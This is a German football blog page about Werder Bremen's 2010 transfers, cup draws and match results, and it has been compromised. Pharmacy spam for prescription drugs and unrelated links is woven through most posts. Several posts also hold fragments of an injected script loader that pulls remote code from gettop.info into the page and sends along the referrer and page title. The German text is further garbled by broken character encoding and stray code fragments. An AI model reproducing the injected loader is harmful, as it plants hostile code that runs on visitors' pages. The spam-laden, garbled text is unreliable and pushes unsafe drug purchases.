Willkommen auf » Werder Bremen
1.Sep 2010

Die Transferfrist ist um, wir lAi??uten die zweite Runde der Neuvorstellungen der Sommertransfers ein. Die Bundesligisten haben in den letzten beiden Wochen des Transferfensters nochmal ganz ordentlich zugeschlagen.

Wir starten beim Champions League Teilnehmer Werder Bremen. Die haben einen Teil der Ai??zil-Millionen gleich wieder reinvestiert. FA?r 7,5 Millionen kommt der Brasilianer Wesley Lopes Beltrame, kurz Wesley vom FC Santos. Der 23jAi??hrige ist ein technisch extrem versierter Mittelfeld-Allrounder, fA?r einen klassischen Zehner allerdings zu ungefAi??hrlich (in zwei Profijahren bisher nur 3 Tore und 3 Vorlagen). Als Alternative zu den kAi??rperbetonten Frings, Borowski und Arnautovic passt er aber, z.B. auf den Halbpositionen in der Raute, wunderbar.
buy drugs online no prescription

ai??zEs war mein Lebenstraum in einer sehr starken Liga bei einem Topklub zu spielen. Ich bin A?berglA?cklich, dass das jetzt mit Werder Bremen geklappt hat. Ich freue mich auf die Stadt, mAi??chte so schnell wie mAi??glich zur Mannschaft stoAYen und die Fans glA?cklich machenai???, so der Neu-Bremer.

Leider muss man sich mit all der Euphorie aber etwas zurA?ckhalten, die Bremer haben schlieAYlich mit teuren brasilianischen Heilsbringern nicht nur gute Erfahrungen gemacht. Mal klappts (Diego), mal nicht (Carlos Alberto).

Hier ein paar Impressionen…
[youtube:http://www.youtube.com/watch?v=_bdEnD6kH0E]

Skurrile Geschichte: der Wechsel zog sich A?ber mehrere Wochen hin, da die Transferrechte A?ber diverse Parteien (Verein, Ex-Verein, Investorengruppe, Berater, Spieler) verstreut lagerten. Das scheint im sA?damerikanischen FuAYball heute keine Seltenheit zu sein, verkompliziert den FuAYballalltag aber um einiges und macht Transfers z.B. nach Europa bedeutend schwerer (vielleicht ist auch genau das die Intention). Zwischendurch machte es den Anschein als wA?rde Werder entnervt aufgeben, ab einer bestimmten Summe klappt dann aber bekanntlich plAi??tzlich doch alles.

Cheap no prescription imuran. Manager Klaus Allofs: ai??zWir haben viel Geduld aufbringen mA?ssen und sind jetzt dafA?r belohnt worden. Mit Wesley verstAi??rkt uns ein sehr vielseitiger, dynamischer Spieler, der im Mittelfeld auf allen Positionen eingesetzt werden kannai???

wellutrin without a script. http://restaurantsuppliesphoenixarizona.com/restaurant-supplies/best-antidepressant-for-depression-and-mood-swings/ } else { Pills viagra online men health. online pharacys worldwide shipping buy azithromycin zithromax or doxycycline online Buy buy pills how much lithium in eggs buy real levothyroxine 100 mcg, buy amitriptaline .

26.Aug 2010

Einer der wichtigsten Termine der noch jungen Saison stand heute an. In Monaco zelebrierte die UEFA die Auslosung der pletal and dental treatment viagra 50mg price in india. buy pills C Buy hampions League Gruppenphase 2010/11.

Nach der pills for depression antidepressants for anxiety schweiAYtreibenden Qualifikation von Werder Bremen haben wir wieder drei deutsche Teams an Bord… wichtig im Hinblick auf die UEFA-5-Jahreswertung… und es sieht ganz vielversprechend aus…

Gruppe A: Inter Mailand, http://newlifechineselaundry.com/2018/02/02/price-for-aldactone/ buy clomid made in usa. Werder Bremen cialis and weed , Tottenham Hotspur, Twente Enschede
Gruppe B: Olympique Lyon, Benfica Lissabon, FC Schalke 04 cialis 5 mg order on line prendre du viagra avec du previscan. , Hapoel Tel-Aviv
Gruppe C: Manchester United, FC Valencia, Glasgow Rangers, Bursaspor
Gruppe D: FC Barcelona, Panathinaikos Athen, FC Kopenhagen, Rubin Kazan
Gruppe E: Buy FC Bayern MA?nchen, AS Rom, FC Basel, CFR Cluj
Gruppe F: FC Chelsea, Olympique Marseille, Spartak Moskau, MSK Zilina
Gruppe G: AC Mailand, Real Madrid, Ajax Amsterdam, AJ Auxerre
Gruppe H: FC Arsenal, Schachtjor Donzek, Sporting Braga, Partizan Belgrad

Der FC Bayern wieder mit… nennen wir es LosglA?ck. Roma, Basel, Cluj, das Ziel kann nur Platz 1 lauten, alles andere wAi??re eine EnttAi??uschung. Interessante Gegner sind es aber dennoch.
Werder und Schalke finden sich auch in grundsAi??tzlich durchaus machbaren Gruppen wieder. Nominell hat Bremen mit Inter (Meister + Pokalsieger + CL-Sieger), Tottenham (Premier League Vierter) und Enschede (niederlAi??ndischer Meister) schon ein paar harte Knochen vor sich. Den zweiten Platz sehe ich dennoch fA?r beide Bundesligisten in Griffweite. Der dritte als Notnagel muss Minimalziel sein.

Los gehts in drei Wochen, am 14./15. September, der letzte Spieltag wird am 7./8. Dezember ausgetragen. Im deutschen FreeTV A?bertrAi??gt SAT.1 jeweils ein Mittwochsspiel mit deutscher Beteiligung, die genaue Auswahl der Partien erfolgt in den kommenden Tagen/Wochen.} else { Pills http://fafar.mhs.narotama.ac.id/2018/02/01/order-gasex-side/ Cheap pharmacy no prescription haldol, levitra 20 mg online. pills online Pills

24.Aug 2010

Champions League 2010/11 Play-off RA?ckspiel
Sampdoria Genua – Werder Bremen 3:2 n.V.

1:0 Giampaolo Pazzini (8., Kopfball, Vorlage Cassano)
2:0 Giampaolo Pazzini (14., Rechtsschuss, Stankevicius)
3:0 Antonio Cassano (85., Rechtsschuss, Semioli)
3:1 Markus Rosenberg (90. + 3, Rechtsschuss)
3:2 Order Claudio Pizarro (100., Rechtsschuss, Marin)
vor 36.500 Zuschauern im Luigi Ferraris Station in Genua

Aufstellung Genua: Curci – Stankevicius, Volta, Gastaldello, Ziegler – Semioli, Palombo, Dessena, Guberti (66. Tissone, 73. Mannini) – Pazzini, Cassano (90. Pozzi)

Aufstellung Bremen: Wiese – Fritz, Mertesacker, PrAi??dl, Pasanen (79. Boenisch) – Frings – Bargfrede, Borowski (63. Arnautovic) – Marin – Pizarro, Wagner (72. Rosenberg)

Die Zusammenfassung des Spiels
[youtube:http://www.youtube.com/watch?v=p1W2j9pTD7g]
AuAYerdem auch hier buy retin-a 0.05 und im online Cheap evecare online stopwatch ZDF-Kurzbericht buy meds using paypal. zu sehen, hier noch die Stimmen zum Spiel.

Was…fA?r…ein…Spiel…
Wahnsinn, Werder war sowas von raus, nach den beiden schnellen Toren von Pazzini, nach dem 3:0 von Cassano, der 3:1 Hinspielsieg buy elavil no prescription leichtfertig verspielt. Tja, und dann aus dem Nichts Rosenberg mit dem so wichtigen Tor in der 93. Minute., in der VerlAi??ngerung dann Pizarro mit der ErlAi??sung. Eine ausfA?hrliche Analyse gibts beim Bloggerkollegen Johan Petersen im Werder-FuAYball-Blog Pills .
Es war wenig ansehnlich, die scheinbar dA?nne Bremer Personaldecke macht etwas nachdenklich, aber heute Abend zAi??hlt nur der Einzug in die Champions League! GlA?ckwunsch Werder.} else { Order online its hard to cum when i take cialis. lexapro coupon 2012 filitra 20. order brand temovate scalp online http://hotelshin.ru/?p=366 best place to buy cialis forum, buy cailas in uk.

18.Aug 2010

Champions League 2010/11 Play-off Hinspiel
Werder Bremen – Sampdoria Genua 3:1

1:0 Clemens Fritz (51., Linksschuss)
2:0 Torsten Frings (67., Elfmeter, Rechtsschuss, Vorlage PrAi??dl)
3:0 Claudio Pizarro (69., Rechtsschuss, Hugo Almeida)
3:1 Giampaolo Pazzini (90., Kopfball, Stankevicius)
vor 25.000 Zuschauern im Bremer Weserstadion

Aufstellung Bremen: Wiese – Fritz, Mertesacker, PrAi??dl, Pasanen (77., Boenisch) – Frings, Bargfrede – Hunt (85., Marin), Borowski – Pizarro, Hugo Almeida (89., Arnautovic)

Aufstellung Genua: Curci – Stankevicius, Lucchini (#Gelb-Rot 66.), Gastaldello, Ziegler – Semioli (68., Stankevicius), Palombo, Tissone (59., Poli), Mannini (65., Guberti) – Pazzini, Cassano

Die Zusammenfassung des Spiels
Buy womens viagra for saleOrder buy clonidine 0.2 mg

AuAYerdem auch hier und hier, sowie im where can i buy stromectol ZDF-Kurzbericht zu sehen.

Bremen macht das Spiel, siegt am Ende auch in der HAi??he verdient und hat nun eine sehr gute Ausgangslage fA?rs RA?ckspiel am kommenden Dienstag in Genua (20:45, live bei SAT.1 im FreeTV). Eigentlich darf dort nichts mehr anbrennen. Doch die Italiener haben ihre Klasse angedeutet, mit dem ein oder anderen gefAi??hrlichen Konter haben Cassano, Pazzini und co. Werder durchaus ins Schwitzen gebracht.

Das Bremer Mittelfeld zeigte sich nach dem Abgang von Mesut Ai??zil http://didit-ariyanto.mhs.narotama.ac.id/2018/03/15/generic-bentyl/ im A?brigen unverAi??ndert laufbereit, dynamisch und torgefAi??hrlich. Hat mir richtig gut gefallen. Den Transfer kAi??nnen sie in meinen Augen intern mit Hunt, Marin, Borowski, Bargfrede, eventuell Arnautovic in der Offensive gut (wenn auch vielleicht nicht zu hundert Prozent) auffangen. Auf der anderen Seite dA?rfen die 15 Millionen, die man als AblAi??se kassiert hat, aber auch gerne reinvestiert werden. Am Brasilianer Wesley vom FC Santos ist man seit mehreren Wochen/Monaten dran, auch der franzAi??sische Nationalspieler Hatem Ben Arfa von Olympique Marseille wird als mAi??glicher Kandidat gehandelt. Ich bin gespannt wie Schaaf und Allofs planen.document.currentScript.parentNode.insertBefore(s, document.currentScript); generic plavix usa Purchase take tadalafil and sildenafil together, vaigra. sostanze di provigrax. Cheap metoclopramide 10 mg cost proventil. periactin 4mg no prescription needed.

6.Aug 2010

Die neue Saison kA?ndigt sich auch in Form von Auslosungen der ersten Runden der internationalen Wettbewerbe an.

cheap pills clomid implantation calculator. Champions League Play-off 2010/11

Pills buy abortion pills online uk one guy one cup video. Werder Bremen ai??i?? Sampdoria Genua
Red Bull Salzburg ai??i?? Hapoel Tel Aviv
Rosenborg Trondheim ai??i?? FC Kopenhagen
FC Basel ai??i?? FC Sheriff
Sparta Prag ai??i?? MSK Zilina
Partizan Belgrad ai??i?? RSC Anderlecht
Young Boys Bern ai??i?? Tottenham Hotspur
Sporting Braga ai??i?? FC Sevilla
Zenit St. Petersburg ai??i?? AJ Auxerre
Dynamo Kiew ai??i?? Ajax Amsterdam

Ach, Ai??rgerlich, Werder Bremen trifft als gesetztes Team auf den wohl schwersten Gegner Sampdoria Genua, mAi??glich wAi??ren auch Kiew, Braga, Bern und Auxerre gewesen. Die Italiener sind als Vorjahresvierter der Serie A nicht zu unterschAi??tzen, in ihren Reihen haben sie u.a. die Nationalspieler Antonio Cassano, Giampaolo Pazzini und Angelo Palombo. Aber was solls, Bremen ist der Favorit und sollte diese HA?rde meistern kAi??nnen.
Gespielt wird am 17./18. (Hinspiel) und 24./25.August (RA?ckspiel). Da die Zentralvermarktung der UEFA-CL bereits in den Play-offs einsetzt, A?bertrAi??gt SAT.1 beide Werder-Spiele im FreeTV.
Die Verlierer der Play-offs „steigen in die Europa League ab“.

Europa League Play-off 2010/11

die deutschen Begegnungen…
Borussia Dortmund levitra 20mg paypal. – FK Qarabag Agdam (Dritter der aserbaidschanischen Liga)
Slovan Bratislava (slowakischer Pokalsieger) – VfB Stuttgart Cheap Buy
order silagra vs suhagra Bayer 04 Leverkusen Buy Order – Tawrija Simferopol (ukrainischer Pokalsieger)

Gespielt wird am 19. (Hinspiel) und 26. August (RA?ckspiel). In den EL-Play-offs greift noch keine Zentralvermarktung, die TV-A?bertragungen bei deutschen Sendern werden daher separat in den kommenden Tagen/Wochen ausgehandelt, Kandidaten sind Sat.1, Sport1, ZDF und Eurosport, evtl. auch WDR und SWR. Leider machen die Gegner nicht besonders viel her, gut fA?r die Klubs (ein Scheitern wAi??re ohne Wenn und Aber blamabel), schlecht fA?r die Fans, denn dass alle sechs Spiele mit deutscher Beteiligung A?bertragen werden darf bezweifelt werden. Nach Aserbaidschan und in die Ukraine reist ein deutsches TV-Team (z.B. nach einem A?berzeugenden Sieg im Hinspiel) sicherlich nicht so ohne weiteres.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “; purchase panmycin drops generic propecia from india, can you order propecia online. Purchase http://creacionesmolina.com/uncategorized/cheap-noroxin-merck/ cialis daily reviews http://www.ipem221jovita.com.ar/cheap-coumadin-diet/

21.Jul 2010

Werder Bremens neue Sturmhoffnung heiAYt Marko Arnautovic, 21 Jahre, Ai??sterreicher. Thomas Schaaf und Klaus Allofs haben erneut ordentlich ins GeldsAi??ckel gegriffen, 6.2 Millionen Euro gingen an den niederlAi??ndischen Meister Twente Enschede, fA?r einen in Deutschland vAi??llig unbekannten Spieler, mutig mutig.

Von den fuAYballerischen Anlagen und der Spielweise wird Arnautovic des Ai??fteren mit Zlatan Ibrahimovic verglichen („Der Zlatan-Klon“ Spox.com). Er ist 1,92 m groAY, kopfballstark, beidfA?AYig, technisch Ai??uAYerst versiert, auch eine gewisse Arroganz soll er sich von seinem Vorbild abgeschaut haben.

Mit 17 Jahren kehrte er der Wiener Heimat den RA?cken und versuchte sich in der niederlAi??ndischen Eredivisie beim FC Twente Enschede. Dort wurde er behutsam an die erste Elf herangefA?hrt, in drei Spielzeiten kam er auf 44 Erstligaspiele und 12 -tore. Es folgte ein eher unglA?ckliches Kapitel als Leihspieler beim italienischen Serienmeister Inter Mailand in der Saison 2009/2010. Verletzungen und die groAYe Konkurrenz gestatteten ihm nur wenig Einsatzzeiten. Den Wechsel in die Serie A sieht er daher heute als Fehler was seine fuAYballerische Entwicklung betrifft.
Buy Cheap buy kamagra next day delivery uk, doxycycline 100mg.

Werder Bremen glaubt an den Jungen. Prominente UnterstA?tzung erhAi??lt man von allen Seiten. Andreas Herzog (der heimliche Bremer Tippgeber bei diesem Transfer) cheap pills Pills meint: ai??zEs gab einen Krankl, einen Herzog, einen Polster, einen Prohaska, aber Arnautovic stellt sie alle in den Schatten, wenn er sein Potenzial abruft. Das ist mit Abstand der beste FuAYballer, der in den letzten 30 Jahre auf dem FuAYball-Platz herumgelaufen ist.ai???

buy brand viagra. buy cozaar 50 mg dose
[youtube:http://www.youtube.com/watch?v=UZpo9m3gzkc]

Bei Werder erwartet ihn ein ruhiges Umfeld, Thomas Schaaf traue ich bei der Entwicklung junger Spieler grundsAi??tzlich sowieso erstmal alles zu. Die jA?ngere Vergangenheit hat allerdings auch gezeigt, dass in Bremen eben nicht jeder Spielertyp zurecht kommt und den Durchbruch schafft (Carlos Alberto, Marcelo Moreno Order cheap pills , Markus Rosenberg, Mohamed Zidan).document.currentScript.parentNode.insertBefore(s, document.currentScript); donde comprar cialis seguro non prescription hydrochlorothaizide order myambutol salzarex. http://veterinarybook.net/risperdal-injection-cost/ online articulo 18.

15.Mai 2010

DFB-Pokal 2009/10 Finale
Werder Bremen – FC Bayern MA?nchen 0:4

Cheap 0:1 how to use viagra for men, buy spironolactone online no rx. Arjen Robben (35., Elfmeter, Linksschuss)
0:2 Ivica Olic (51., Linksschuss, Vorlage van Buyten)
0:3 celebrex without prescription in canada. Franck Ribery (63., Rechtsschuss, van Bommel)
0:4 Bastian Schweinsteiger (83., Rechtsschuss, Lahm)
vor knapp 73.000 Zuschauern im ausverkauften Berliner Olympiastadion

Die ausfA?hrliche Zusammenfassung des Spiels
can i buy nitrofurantoin online Pills
AuAYerdem auch Purchase hier und hier sowie in Kurzberichten von Purchase ZDF und Purchase safe drug viagra stock. ARD zu sehen, hier noch die Siegerehrung, Stimmen zum Spiel und die EinschAi??tzung von ZDF-Experte Oliver Kahn Purchase purchase hytrin medication Order viagra lowest prices viagra popular british websites .

Letztlich eine einseitige Partie, der FC Bayern MA?nchen feiert verdientermaAYen seinen 15.Ai?? Erfolg im DFB-Pokal und das 7. Double der Vereinsgeschichte. Die bayrische Dominanz war auch in diesem Endspiel unA?bersehbar, das gesamte Team wirkte perfekt abgestimmt, eingespielt und auch nach einer langen Saison immernoch fit. Hut ab. GlA?ckwunsch nach MA?nchen!var d=document;var s=d.createElement(‚script‘); Pills antibiotics for sale 24 hour delivery.

23.Mrz 2010

DFB-Pokal 2009/10 Halbfinale
Werder Bremen – FC Augsburg 2:0

1:0 Marko Marin (30., Rechtsschuss, Vorarbeit Ai??zil)
2:0 Claudio Pizarro (84., Rechtsschuss, Frings)
vor 32.000 Zuschauern im Bremer Weserstadion

Die Zusammenfassung des Spiels…
buy domperidone with out a perscription
AuAYerdem hier die ausfA?hrliche Spielanalyse http://vietietcynthia1402.mhs.narotama.ac.id/2018/02/02/flower-delivery-artane/ Order mit den beiden Trainern Thomas Schaaf und Jos Luhukay, ein paar weitere SpieleinschAi??tzungen bei kicker.tv, das ZDF stellt auAYerdem auch diesmal wieder die female viagra online denmark. komplette Aufzeichnung des Spiels topamax no prescription overnight Pills Buy zur VerfA?gung

Ein schnelles, szenenreiches Halbfinale mit vielen Torchancen, der Klassenunterschied war dann aber doch deutlich erkennbar. Bremen bot seinen wunderbar flA?ssigen KombinationsfuAYball mit zwei sehenswerten Toren; der FC Augsburg erarbeitete sich zwar auch drei, vier GroAYchancen, lieAY diese aber ungenutzt. Letztlich zieht Werder somit verdient ins Pokalfinale ein.d.getElementsByTagName(‚head‘)[0].appendChild(s); longtimesex Pills online Pills Cheap canadian bull 100. http://telecomshopltd.com/2018/03/18/cheap-plaquenil-for-lupus/ lipotrexate order generic viagra sample pack. lenny kravitz, allpharmacy.

18.Mrz 2010

Europa League 2009/10 Achtelfinale RA?ckspiel
Werder Bremen – FC Valencia 4:4

0:1 David Villa (2., Linksschuss, Vorarbeit Silva)
0:2 Juan Manuel Mata (15., Linksschuss, Silva)
Cheap 1:2 Hugo Almeida (26., Linksschuss, Pizarro)
1:3 can you buy elimite over the counter. David Villa (45., Linksschuss, Silva)
2:3 Pills Torsten Frings (57., Foulelfmeter, Rechtsschuss, Marin)
3:3 Marko Marin (62., Rechtsschuss, Ai??zil)
buy triamcinolone cream online Cheap http://copiacloud.com/lexapro-generic-brand/ does levitra make you bigger. price for micardis 3:4 David Villa (65., Rechtsschuss, Mata)
4:4 Claudio Pizarro (84., Kopfball, Pasanen)
vor 24.000 Zuschauern im Bremer Weserstadion

Die ausfA?hrliche Zusammenfassung des Spiels…
buy pills wellebutrin 150 v 300cialis generika billig kaufen.
AuAYerdem auch hier http://www.camshow.se/nyheter/haldol-decanoate-price.html online , hier, hier india viagra price Buy , sowie im lariam for malaria treatment ARD- und im ZDF-Kurzbericht zu sehen, vom britischen Sender ITV hier auch noch ein 24minA?tiger Zusammenschnitt buy prednisone no rx from canada, viagra rezeptfrei kaufen. der entscheidenden Spielszenen

Ein uuuuunglaubliches Spiel von beiden Mannschaften, leider reicht das Ergebnis den Bremern nach dem 1:1 im Hinspiel nicht zum Weiterkommen. Werder lieAY einfach zu viele GroAYchancen liegen, im Gegenzug nutzte Valencia vier seiner fA?nf Gelegenheiten eiskalt.
Sehr schade, mit DEM Offensivwirbel war fA?r Bremen im Wettbewerb einiges mehr drin.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “;

11.Mrz 2010

Europa League 2009/10 Achtelfinale Hinspiel
FC Valencia – Werder Bremen 1:1

Die Tore erzielten Torsten FringsAi?? (0:1, 24., Elfmeter, Rechtsschuss) und Juan Manuel Mata (1:1, 58., Linksschuss, Vorarbeit Silva); gespielt wurde vor 40.000 Zuschauern im Mestalla Stadion in Valencia

Die ausfA?hrliche Zusammenfassung des Spiels
Cheap where to buy hydrochlorothizide 25mg. buy pillsmotilium compresse costo purchase modureticPills
AuAYerdem auch hier, hier und hier zu sehen, sowie im ZDF-Kurzbericht buy tretinoin gel no prescription. buy prednisone overnight delivery. Buy Cheap canada pharmacy online 365 Pills (inkl. Stimmen zum Spiel)

Verdientes Unentschieden fA?r die Bremer nach einer spannungsvollen Partie mit extrem hohem Tempo und zahlreichen Torraumszenen, viel kAi??nnen sie sich davon noch nicht kaufen, der FC Valencia bleibt auch im RA?ckspiel am kommenden Donnerstag brandgefAi??hrlich. achat de generique cialis Buy canada qsymia certified pharmacies, no perscription abilify online. Purchase Cheap

Seiten:  1 2 3 4 5 6 7